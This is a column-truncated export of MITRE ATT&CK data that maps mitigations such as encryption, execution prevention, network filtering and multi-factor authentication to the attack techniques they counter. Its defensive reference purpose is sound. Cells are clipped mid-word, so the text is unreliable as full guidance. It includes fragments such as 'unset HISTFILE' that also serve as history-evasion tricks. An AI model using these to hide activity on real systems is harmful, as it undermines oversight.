M1041 Encrypt Sencourse-of- mitigation mitigates T1114.001Local Emailattack-pat technique Use of encr
M1041 Encrypt Sencourse-of- mitigation mitigates T1003.003NTDS attack-pat technique Ensure Doma
M1041 Encrypt Sencourse-of- mitigation mitigates T1602.002Network Deattack-pat technique Configure S
M1041 Encrypt Sencourse-of- mitigation mitigates T1040 Network Snattack-pat technique Ensure that
M1041 Encrypt Sencourse-of- mitigation mitigates T1003 OS Credentattack-pat technique Ensure Dom
M1041 Encrypt Sencourse-of- mitigation mitigates T1552.004Private Keyattack-pat technique When possib
M1041 Encrypt Sencourse-of- mitigation mitigates T1114.002Remote Ema attack-pat technique Use of encr
M1041 Encrypt Sencourse-of- mitigation mitigates T1602.001SNMP (MIBattack-pat technique Configure
M1041 Encrypt Sencourse-of- mitigation mitigates T1558.002Silver Tickeattack-pat technique Enable
Ensure AES
certificates as well as
M1041 Encrypt Sencourse-of- mitigation mitigates T1649 Steal or Foattack-pat technique Authentication.(Citation: Spe
M1041 Encrypt Sencourse-of- mitigation mitigates T1558 Steal or Foattack-pat technique Enable AES
M1041 Encrypt Sencourse-of- mitigation mitigates T1565.001Stored Datattack-pat technique Consider en
M1041 Encrypt Sencourse-of- mitigation mitigates T1020.001Traffic Dupattack-pat technique Ensure that
M1041 Encrypt Sencourse-of- mitigation mitigates T1565.002Transmitteattack-pat technique Encrypt all
M1041 Encrypt Sencourse-of- mitigation mitigates T1552 Unsecuredattack-pat technique When possib
M1039 Environmen course-of- mitigation mitigates T1070.003Clear Comm attack-pat technique Making the
M1039 Environmen course-of- mitigation mitigates T1562.003Impair Comattack-pat technique Prevent us
M1038 Execution course-of- mitigation mitigates T1548 Abuse Elevattack-pat technique System sett
M1038 Execution course-of- mitigation mitigates T1546.008Accessibili attack-pat technique Adversaries
M1038 Execution course-of- mitigation mitigates T1546.009AppCert DLattack-pat technique Adversaries
M1038 Execution course-of- mitigation mitigates T1546.010AppInit DL attack-pat technique Adversaries
M1038 Execution course-of- mitigation mitigates T1059.002AppleScripattack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1059.010AutoHotKey attack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1176 Browser Exattack-pat technique Set a brows
M1038 Execution course-of- mitigation mitigates T1218.003CMSTP attack-pat technique Consider us
M1038 Execution course-of- mitigation mitigates T1574.012COR_PROFIattack-pat technique Identify a
M1038 Execution course-of- mitigation mitigates T1059.009Cloud API attack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1059 Command attack-pat
an technique Use applica
M1038 Execution course-of- mitigation mitigates T1218.001Compiled Hattack-pat technique Consider us
M1038 Execution course-of- mitigation mitigates T1609 Container attack-pat technique Use read-on
M1038 Execution course-of- mitigation mitigates T1218.002Control Pa attack-pat technique Identify an
M1038 Execution course-of- mitigation mitigates T1574.001DLL Searchattack-pat technique Adversaries
M1038 Execution course-of- mitigation mitigates T1562.001Disable or attack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1574.006Dynamic Liattack-pat technique Adversaries
M1038 Execution course-of- mitigation mitigates T1218.015Electron Apattack-pat technique Do not disable `webSecurity`
M1038 Execution course-of- mitigation mitigates T1548.004Elevated E attack-pat technique System sett
M1038 Execution course-of- mitigation mitigates T1611 Escape to attack-pat technique Use read-on
M1038 Execution course-of- mitigation mitigates T1068 Exploitatioattack-pat technique Consider bl
M1038 Execution course-of- mitigation mitigates T1553.001Gatekeeperattack-pat technique System sett
M1038 Execution course-of- mitigation mitigates T1564.003Hidden Wi attack-pat technique Limit or re
M1038 Execution course-of- mitigation mitigates T1574 Hijack Exe attack-pat technique Adversaries
M1038 Execution course-of- mitigation mitigates T1505.004IIS Componattack-pat technique Restrict un
M1038 Execution course-of- mitigation mitigates T1562 Impair Defattack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1490 Inhibit Sy attack-pat technique Consider us
M1038 Execution course-of- mitigation mitigates T1218.004InstallUtil attack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1059.007JavaScript attack-pat technique Denylist sc
M1038 Execution course-of- mitigation mitigates T1547.006Kernel Modattack-pat technique Application
M1038 Execution course-of- mitigation mitigates T1546.006LC_LOAD_Dattack-pat technique Allow appli
M1038 Execution course-of- mitigation mitigates T1059.011Lua attack-pat technique Denylist Lu
M1038 Execution course-of- mitigation mitigates T1218.014MMC attack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1127.001MSBuild attack-pat technique Use applic
M1038 Execution course-of- mitigation mitigates T1204.002Malicious Fattack-pat technique Application
M1038 Execution course-of- mitigation mitigates T1553.005Mark-of-thattack-pat technique Consider bl
M1038 Execution course-of- mitigation mitigates T1036.008Masquerade attack-pat technique
M1038 Execution course-of- mitigation mitigates T1036 Masqueradattack-pat technique Use tools t
M1038 Execution course-of- mitigation mitigates T1036.005Match Legiattack-pat technique Use tools t
M1038 Execution course-of- mitigation mitigates T1218.013Mavinject attack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1218.005Mshta attack-pat technique Use applic
M1038 Execution course-of- mitigation mitigates T1106 Native API attack-pat technique Identify an
M1038 Execution course-of- mitigation mitigates T1059.008Network Deattack-pat technique TACACS+ ca
M1038 Execution course-of- mitigation mitigates T1218.008Odbcconf attack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1574.007Path Inter attack-pat technique Adversaries
M1038 Execution course-of- mitigation mitigates T1574.008Path Intercattack-pat technique Adversaries
M1038 Execution course-of- mitigation mitigates T1574.009Path Inter attack-pat technique Adversaries
M1038 Execution course-of- mitigation mitigates T1059.001PowerShellattack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1216.001PubPrn attack-pat technique Certain sig
M1038 Execution course-of- mitigation mitigates T1059.006Python attack-pat technique Denylist P
M1038 Execution course-of- mitigation mitigates T1218.009Regsvcs/R attack-pat technique Block execu
M1038 Execution course-of- mitigation mitigates T1219 Remote Accattack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1564.006Run Virtualattack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1553.003SIP and Truattack-pat technique Enable appl
M1038 Execution course-of- mitigation mitigates T1546.002Screensaveattack-pat technique Block .scr
M1038 Execution course-of- mitigation mitigates T1129 Shared Moattack-pat technique Identify an
M1038 Execution course-of- mitigation mitigates T1547.009Shortcut Mattack-pat technique Prevents ma
M1038 Execution course-of- mitigation mitigates T1562.011Spoof Securattack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1553 Subvert Truattack-pat technique System sett
M1038 Execution course-of- mitigation mitigates T1216.002SyncAppvPu attack-pat technique Certain sig
M1038 Execution course-of- mitigation mitigates T1218 System Binattack-pat technique Consider us
M1038 Execution course-of- mitigation mitigates T1216 System Scrattack-pat technique Certain sig
M1038 Execution course-of- mitigation mitigates T1080 Taint Shar attack-pat technique Identify po
M1038 Execution course-of- mitigation mitigates T1127 Trusted Dev attack-pat technique Certain dev
M1038 Execution course-of- mitigation mitigates T1059.004Unix Shell attack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1204 User Execuattack-pat technique Application
M1038 Execution course-of- mitigation mitigates T1218.012Verclsid attack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1059.005Visual Basiattack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1059.003Windows Cattack-pat technique Use applica
M1038 Execution course-of- mitigation mitigates T1047 Windows M attack-pat technique Use applic
M1038 Execution course-of- mitigation mitigates T1547.004Winlogon Hattack-pat technique Identify an
M1038 Execution course-of- mitigation mitigates T1220 XSL Script attack-pat technique If msxsl.ex
M1050 Exploit Procourse-of- mitigation mitigates T1189 Drive-by C attack-pat technique Security ap Enhanced Mitigati
Microsoft's
M1050 Exploit Procourse-of- mitigation mitigates T1218.015Electron Apattack-pat technique Ensure that Electron is updat
M1050 Exploit Procourse-of- mitigation mitigates T1190 Exploit Pubattack-pat technique Web Applica
M1050 Exploit Procourse-of- mitigation mitigates T1203 Exploitatioattack-pat technique Security ap
M1050 Exploit Procourse-of- mitigation mitigates T1212 Exploitatioattack-pat technique Security ap
M1050 Exploit Procourse-of- mitigation mitigates T1211 Exploitatioattack-pat technique Security ap
M1050 Exploit Procourse-of- mitigation mitigates T1068 Exploitatioattack-pat technique Security ap
M1050 Exploit Procourse-of- mitigation mitigates T1210 Exploitatioattack-pat technique Security ap
M1050 Exploit Procourse-of- mitigation mitigates T1218.010Regsvr32 attack-pat technique Microsoft's
M1050 Exploit Procourse-of- mitigation mitigates T1218.011Rundll32 attack-pat technique Microsoft's
M1050 Exploit Procourse-of- mitigation mitigates T1218 System Binattack-pat technique Microsoft's
M1050 Exploit Procourse-of- mitigation mitigates T1080 Taint Shar attack-pat technique Use utiliti
M1037 Filter Netwcourse-of- mitigation mitigates T1557.002ARP Cache attack-pat technique Consider en
M1037 Filter Netwcourse-of- mitigation mitigates T1557 Adversary-attack-pat technique Use network
M1037 Filter Netwcourse-of- mitigation mitigates T1499.003Applicatio attack-pat technique Leverage se
M1037 Filter Netwcourse-of- mitigation mitigates T1071 Applicationattack-pat technique Use network
M1037 Filter Netwcourse-of- mitigation mitigates T1499.004Applicationattack-pat technique Leverage se
M1037 Filter Netwcourse-of- mitigation mitigates T1197 BITS Jobs attack-pat technique Modify netw
M1037 Filter Netwcourse-of- mitigation mitigates T1552.005Cloud Inst attack-pat technique Limit acces
M1037 Filter Netwcourse-of- mitigation mitigates T1557.003DHCP Spooattack-pat technique Additionally, block DHCPv6 tr
M1037 Filter Netwcourse-of- mitigation mitigates T1071.004DNS attack-pat technique Consider f
M1037 Filter Netwcourse-of- mitigation mitigates T1530 Data from attack-pat technique Cloud servi
M1037 Filter Netwcourse-of- mitigation mitigates T1602 Data from attack-pat technique Apply exte
M1037 Filter Netwcourse-of- mitigation mitigates T1498.001Direct Net attack-pat technique As immediate response may
M1037 Filter Netwcourse-of- mitigation mitigates T1499 Endpoint De attack-pat technique Leverage se
M1037 Filter Netwcourse-of- mitigation mitigates T1048 Exfiltratio attack-pat technique Enforce pro
M1037 Filter Netwcourse-of- mitigation mitigates T1048.002Exfiltrati attack-pat technique Enforce pro
M1037 Filter Netwcourse-of- mitigation mitigates T1048.001Exfiltrati attack-pat technique Enforce pro
M1037 Filter Netwcourse-of- mitigation mitigates T1048.003Exfiltrati attack-pat technique Enforce pro
M1037 Filter Netwcourse-of- mitigation mitigates T1187 Forced Autattack-pat technique Block SMB traffic from exiting
M1037 Filter Netwcourse-of- mitigation mitigates T1557.001LLMNR/NBT attack-pat technique Use host-ba
M1037 Filter Netwcourse-of- mitigation mitigates T1570 Lateral Tooattack-pat technique Consider us
M1037 Filter Netwcourse-of- mitigation mitigates T1090.003Multi-hop attack-pat technique Traffic to
M1037 Filter Netwcourse-of- mitigation mitigates T1599.001Network Adattack-pat technique Block Traff
M1037 Filter Netwcourse-of- mitigation mitigates T1599 Network Boattack-pat technique Upon identi
M1037 Filter Netwcourse-of- mitigation mitigates T1498 Network Deattack-pat technique As immediate response may
M1037 Filter Netwcourse-of- mitigation mitigates T1602.002Network Deattack-pat technique Apply exte
M1037 Filter Netwcourse-of- mitigation mitigates T1095 Non-Applicattack-pat technique Filter netw
M1037 Filter Netwcourse-of- mitigation mitigates T1499.001OS Exhaustattack-pat technique Leverage se
M1037 Filter Netwcourse-of- mitigation mitigates T1205.001Port Knockattack-pat technique Mitigation
M1037 Filter Netwcourse-of- mitigation mitigates T1572 Protocol T attack-pat technique Consider fi
M1037 Filter Netwcourse-of- mitigation mitigates T1090 Proxy attack-pat technique Traffic to
M1037 Filter Netwcourse-of- mitigation mitigates T1071.005Publish/Subattack-pat technique Consider fi
M1037 Filter Netwcourse-of- mitigation mitigates T1498.002Reflection attack-pat technique As immediate response may
M1037 Filter Netwcourse-of- mitigation mitigates T1219 Remote Accattack-pat technique Properly co
M1037 Filter Netwcourse-of- mitigation mitigates T1021.002SMB/Windo attack-pat technique Consider us
M1037 Filter Netwcourse-of- mitigation mitigates T1602.001SNMP (MIBattack-pat technique Apply exte
M1037 Filter Netwcourse-of- mitigation mitigates T1499.002Service Ex attack-pat technique Leverage se
M1037 Filter Netwcourse-of- mitigation mitigates T1205.002Socket Filt attack-pat technique Mitigation
M1037 Filter Netwcourse-of- mitigation mitigates T1218 System Binattack-pat technique Use network
M1037 Filter Netwcourse-of- mitigation mitigates T1205 Traffic Signattack-pat technique Mitigation
M1037 Filter Netwcourse-of- mitigation mitigates T1537 Transfer D attack-pat technique Implement n
M1037 Filter Netwcourse-of- mitigation mitigates T1552 Unsecuredattack-pat technique Limit acces
M1037 Filter Netwcourse-of- mitigation mitigates T1021.005VNC attack-pat technique VNC default
M1037 Filter Netwcourse-of- mitigation mitigates T1218.012Verclsid attack-pat technique Consider mo
M1035 Limit Acce course-of- mitigation mitigates T1557.002ARP Cache attack-pat technique Create stat
M1035 Limit Acce course-of- mitigation mitigates T1546.008Accessibili attack-pat technique If possibl
M1035 Limit Acce course-of- mitigation mitigates T1557 Adversary-attack-pat technique Limit acces
M1035 Limit Acce course-of- mitigation mitigates T1612 Build Imagattack-pat technique Limit commu
M1035 Limit Acce course-of- mitigation mitigates T1552.005Cloud Inst attack-pat technique Limit acces
M1035 Limit Acce course-of- mitigation mitigates T1552.007Container attack-pat technique Limit commu
M1035 Limit Acce course-of- mitigation mitigates T1609 Container attack-pat technique Limit commu
M1035 Limit Acce course-of- mitigation mitigates T1613 Container attack-pat technique Limit commu
M1035 Limit Acce course-of- mitigation mitigates T1610 Deploy Conattack-pat technique Limit commu
M1035 Limit Acce course-of- mitigation mitigates T1133 External R attack-pat technique Limit acce
M1035 Limit Acce course-of- mitigation mitigates T1200 Hardware Aattack-pat technique Establish n
M1035 Limit Acce course-of- mitigation mitigates T1542 Pre-OS Booattack-pat technique Prevent acc
M1035 Limit Acce course-of- mitigation mitigates T1563.002RDP Hijackattack-pat technique Use remote
M1035 Limit Acce course-of- mitigation mitigates T1021.001Remote Des attack-pat technique Use remote
M1035 Limit Acce course-of- mitigation mitigates T1021 Remote Serattack-pat technique Prevent acc
M1035 Limit Acce course-of- mitigation mitigates T1021.002SMB/Windo attack-pat technique Consider d
M1035 Limit Acce course-of- mitigation mitigates T1542.005TFTP Boot attack-pat technique Restrict us
M1035 Limit Acce course-of- mitigation mitigates T1552 Unsecuredattack-pat technique Limit netwo
M1034 Limit Hardwcourse-of- mitigation mitigates T1052 Exfiltratio attack-pat technique Limit the
M1034 Limit Hardwcourse-of- mitigation mitigates T1052.001Exfiltratio attack-pat technique Limit the
M1034 Limit Hardwcourse-of- mitigation mitigates T1200 Hardware Aattack-pat technique Block unkn
M1034 Limit Hardwcourse-of- mitigation mitigates T1091 Replicatio attack-pat technique Limit the
M1033 Limit Softwcourse-of- mitigation mitigates T1176 Browser Exattack-pat technique Only instal
M1033 Limit Softwcourse-of- mitigation mitigates T1059 Command attack-pat
an technique Prevent use
M1033 Limit Softwcourse-of- mitigation mitigates T1195.001Compromise attack-pat technique Where possi
M1033 Limit Softwcourse-of- mitigation mitigates T1543 Create or attack-pat technique Restrict so
M1033 Limit Softwcourse-of- mitigation mitigates T1564.003Hidden Wi attack-pat technique Restrict th
M1033 Limit Softwcourse-of- mitigation mitigates T1564 Hide Artifaattack-pat technique Restrict th
M1033 Limit Softwcourse-of- mitigation mitigates T1059.011Lua attack-pat technique Prevent use
M1033 Limit Softwcourse-of- mitigation mitigates T1059.006Python attack-pat technique Prevent use
M1033 Limit Softwcourse-of- mitigation mitigates T1072 Software Dattack-pat technique Restrict th
M1033 Limit Softwcourse-of- mitigation mitigates T1195 Supply Chaattack-pat technique Where possi
M1033 Limit Softwcourse-of- mitigation mitigates T1543.002Systemd Seattack-pat technique Restrict so
M1033 Limit Softwcourse-of- mitigation mitigates T1021.005VNC attack-pat technique Restrict so
M1033 Limit Softwcourse-of- mitigation mitigates T1547.013XDG Autostattack-pat technique Restrict so
M1032 Multi-factocourse-of- mitigation mitigates T1098 Account Ma attack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1098.001Additional attack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1098.003Additional attack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1098.006Additional attack-pat technique Require mul
M1032 Multi-factocourse-of- mitigation mitigates T1098.002Additional attack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1110 Brute Forc attack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1136.003Cloud Accoattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1078.004Cloud Accoattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1021.007Cloud Servattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1213.003Code Reposattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1136 Create Accattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1110.004Credential attack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1485 Data Destrattack-pat technique Implement m
M1032 Multi-factocourse-of- mitigation mitigates T1530 Data from attack-pat technique Consider us
M1032 Multi-factocourse-of- mitigation mitigates T1213 Data from attack-pat technique Use two or
M1032 Multi-factocourse-of- mitigation mitigates T1078.001Default Ac attack-pat technique Implement m
M1032 Multi-factocourse-of- mitigation mitigates T1098.005Device Regiattack-pat technique Require mul
M1032 Multi-factocourse-of- mitigation mitigates T1136.002Domain Acattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1078.002Domain Acattack-pat technique Integrating
M1032 Multi-factocourse-of- mitigation mitigates T1556.001Domain Con attack-pat technique Integrating
M1032 Multi-factocourse-of- mitigation mitigates T1601.002Downgradeattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1114 Email Colleattack-pat technique Use of mult
M1032 Multi-factocourse-of- mitigation mitigates T1133 External R attack-pat technique Use strong
M1032 Multi-factocourse-of- mitigation mitigates T1556.007Hybrid Idenattack-pat technique Integrating
M1032 Multi-factocourse-of- mitigation mitigates T1136.001Local Acco attack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1078.003Local Acco attack-pat technique Enable mult
M1032 Multi-factocourse-of- mitigation mitigates T1556 Modify Autattack-pat technique Integrating
M1032 Multi-factocourse-of- mitigation mitigates T1601 Modify Sysattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1556.006Multi-Fact attack-pat technique Ensure that
M1032 Multi-factocourse-of- mitigation mitigates T1621 Multi-Fact attack-pat technique Implement
M1032 Multi-factocourse-of- mitigation mitigates T1599.001Network Adattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1599 Network Boattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1556.004Network Deattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1040 Network Snattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1110.002Password Cattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1110.001Password Gattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1110.003Password Sattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1601.001Patch Syst attack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1556.003Pluggable attack-pat technique Integrating
M1032 Multi-factocourse-of- mitigation mitigates T1021.001Remote Des attack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1114.002Remote Ema attack-pat technique Use of mult
M1032 Multi-factocourse-of- mitigation mitigates T1021 Remote Serattack-pat technique Use multi-f
M1032 Multi-factocourse-of- mitigation mitigates T1021.004SSH attack-pat technique Require mul
M1032 Multi-factocourse-of- mitigation mitigates T1072 Software Dattack-pat technique Ensure prop
M1032 Multi-factocourse-of- mitigation mitigates T1539 Steal Web attack-pat technique Implement Conditional Acces
M1032 Multi-factocourse-of- mitigation mitigates T1199 Trusted Relattack-pat technique Require MFA
M1032 Multi-factocourse-of- mitigation mitigates T1078 Valid Acco attack-pat technique Implement m
M1031 Network Incourse-of- mitigation mitigates T1557.002ARP Cache attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1557 Adversary-attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1071 Applicationattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1573.002Asymmetricattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1102.002Bidirectio attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1557.003DHCP Spooattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1071.004DNS attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1132 Data Encodattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1001 Data Obfusattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1030 Data Transfattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1602 Data from attack-pat technique Configure
M1031 Network Incourse-of- mitigation mitigates T1102.001Dead Dropattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1568.002Domain Gen attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1568 Dynamic Reattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1573 Encrypted attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1557.004Evil Twin attack-pat technique Wireless in
M1031 Network Incourse-of- mitigation mitigates T1048 Exfiltratio attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1048.002Exfiltrati attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1041 Exfiltratio attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1048.001Exfiltrati attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1048.003Exfiltrati attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1090.002External Prattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1008 Fallback C attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1071.002File Transf attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1105 Ingress Tooattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1090.001Internal Prattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1001.001Junk Data attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1557.001LLMNR/NBT attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1570 Lateral Tooattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1071.003Mail Protocattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1204.003Malicious attack-pat technique Network pr
M1031 Network Incourse-of- mitigation mitigates T1204.001Malicious Lattack-pat technique If a link i
M1031 Network Incourse-of- mitigation mitigates T1104 Multi-Stag attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1602.002Network Deattack-pat technique Configure
M1031 Network Incourse-of- mitigation mitigates T1046 Network Seattack-pat technique Use networ
M1031 Network Incourse-of- mitigation mitigates T1095 Non-Applicattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1132.002Non-Standaattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1571 Non-Standaattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1102.003One-Way Cattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1566 Phishing attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1572 Protocol T attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1001.003Protocol o attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1090 Proxy attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1071.005Publish/Subattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1542.004ROMMONki attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1219 Remote Accattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1602.001SNMP (MIBattack-pat technique Configure
M1031 Network Incourse-of- mitigation mitigates T1029 Scheduled attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1566.001Spearphishattack-pat technique Network in
M1031 Network Incourse-of- mitigation mitigates T1132.001Standard Eattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1001.002Steganogr attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1573.001Symmetric attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1542.005TFTP Boot attack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1221 Template Iattack-pat technique Network/Ho
M1031 Network Incourse-of- mitigation mitigates T1204 User Execuattack-pat technique If a link i
M1031 Network Incourse-of- mitigation mitigates T1071.001Web Protocattack-pat technique Network int
M1031 Network Incourse-of- mitigation mitigates T1102 Web Servicattack-pat technique Network int
M1030 Network S course-of- mitigation mitigates T1098 Account Ma attack-pat technique Configure a
M1030 Network S course-of- mitigation mitigates T1098.001Additional attack-pat technique Configure a
M1030 Network S course-of- mitigation mitigates T1557 Adversary-attack-pat technique Network seg
M1030 Network S course-of- mitigation mitigates T1612 Build Imagattack-pat technique Deny direct
M1030 Network S course-of- mitigation mitigates T1136.003Cloud Accoattack-pat technique Configure a
M1030 Network S course-of- mitigation mitigates T1552.007Container attack-pat technique Deny direct
M1030 Network S course-of- mitigation mitigates T1613 Container attack-pat technique Deny direct
M1030 Network S course-of- mitigation mitigates T1136 Create Accattack-pat technique Configure a
M1030 Network S course-of- mitigation mitigates T1565 Data Manipattack-pat technique Identify cr
M1030 Network S course-of- mitigation mitigates T1602 Data from attack-pat technique Segregate
M1030 Network S course-of- mitigation mitigates T1610 Deploy Conattack-pat technique Deny direct
M1030 Network S course-of- mitigation mitigates T1021.003Distribute attack-pat technique Enable Win
M1030 Network S course-of- mitigation mitigates T1136.002Domain Acattack-pat technique Configure a
M1030 Network S course-of- mitigation mitigates T1482 Domain Truattack-pat technique Employ net
M1030 Network S course-of- mitigation mitigates T1048 Exfiltratio attack-pat technique Follow best
M1030 Network S course-of- mitigation mitigates T1048.002Exfiltrati attack-pat technique Follow best
M1030 Network S course-of- mitigation mitigates T1048.001Exfiltrati attack-pat technique Follow best
M1030 Network S course-of- mitigation mitigates T1048.003Exfiltrati attack-pat technique Follow best
M1030 Network S course-of- mitigation mitigates T1190 Exploit Pubattack-pat technique Segment ext
M1030 Network S course-of- mitigation mitigates T1210 Exploitatioattack-pat technique Segment net
M1030 Network S course-of- mitigation mitigates T1133 External R attack-pat technique Deny direct
M1030 Network S course-of- mitigation mitigates T1557.001LLMNR/NBT attack-pat technique Network seg
M1030 Network S course-of- mitigation mitigates T1602.002Network Deattack-pat technique Segregate
M1030 Network S course-of- mitigation mitigates T1046 Network Seattack-pat technique Ensure prop
M1030 Network S course-of- mitigation mitigates T1040 Network Snattack-pat technique Deny direc
M1030 Network S course-of- mitigation mitigates T1095 Non-Applicattack-pat technique Properly co
M1030 Network S course-of- mitigation mitigates T1571 Non-Standaattack-pat technique Properly co
M1030 Network S course-of- mitigation mitigates T1563.002RDP Hijackattack-pat technique Enable fire
M1030 Network S course-of- mitigation mitigates T1021.001Remote Des attack-pat technique Do not leav
M1030 Network S course-of- mitigation mitigates T1563 Remote Serattack-pat technique Enable fire
M1030 Network S course-of- mitigation mitigates T1565.003Runtime Daattack-pat technique Identify cr
M1030 Network S course-of- mitigation mitigates T1602.001SNMP (MIBattack-pat technique Segregate
M1030 Network S course-of- mitigation mitigates T1489 Service Stoattack-pat technique Operate int
M1030 Network S course-of- mitigation mitigates T1072 Software Dattack-pat technique Ensure prop
M1030 Network S course-of- mitigation mitigates T1199 Trusted Relattack-pat technique Network se
M1030 Network S course-of- mitigation mitigates T1021.006Windows Rattack-pat technique If the serv
M1028 Operating course-of- mitigation mitigates T1548 Abuse Elevattack-pat technique Application
M1028 Operating course-of- mitigation mitigates T1546.008Accessibili attack-pat technique To use this
M1028 Operating course-of- mitigation mitigates T1087 Account Diattack-pat technique Prevent ad
M1028 Operating course-of- mitigation mitigates T1098 Account Ma attack-pat technique Protect dom
M1028 Operating course-of- mitigation mitigates T1053.002At attack-pat technique Configure s
M1028 Operating course-of- mitigation mitigates T1197 BITS Jobs attack-pat technique <code>unset
Consider reducing the defaul
HISTFILE</code
M1028 Operating course-of- mitigation mitigates T1552.003Bash Histo attack-pat technique <code>ln -s /dev/null ~/.bash
M1028 Operating course-of- mitigation mitigates T1003.005Cached Dom attack-pat technique Consider l
M1028 Operating course-of- mitigation mitigates T1092 Communicaattack-pat technique Disallow or
M1028 Operating course-of- mitigation mitigates T1136 Create Accattack-pat technique Protect dom
M1028 Operating course-of- mitigation mitigates T1543 Create or attack-pat technique Ensure that
M1028 Operating course-of- mitigation mitigates T1087.002Domain Acattack-pat technique Prevent ad
M1028 Operating course-of- mitigation mitigates T1136.002Domain Acattack-pat technique Protect dom
M1028 Operating course-of- mitigation mitigates T1036.007Double Fileattack-pat technique Disable the
M1028 Operating course-of- mitigation mitigates T1574.006Dynamic Liattack-pat technique When System
M1028 Operating course-of- mitigation mitigates T1011.001Exfiltratio attack-pat technique Prevent th
M1028 Operating course-of- mitigation mitigates T1011 Exfiltrati attack-pat technique Prevent th
M1028 Operating course-of- mitigation mitigates T1564.002Hidden Useattack-pat technique If the comp
M1028 Operating course-of- mitigation mitigates T1562.003Impair Comattack-pat technique Make sure
M1028 Operating course-of- mitigation mitigates T1490 Inhibit Sy attack-pat technique Consider te
M1028 Operating course-of- mitigation mitigates T1553.004Install Rootattack-pat technique Windows Gr
M1028 Operating course-of- mitigation mitigates T1003.001LSASS Memattack-pat technique Consider di
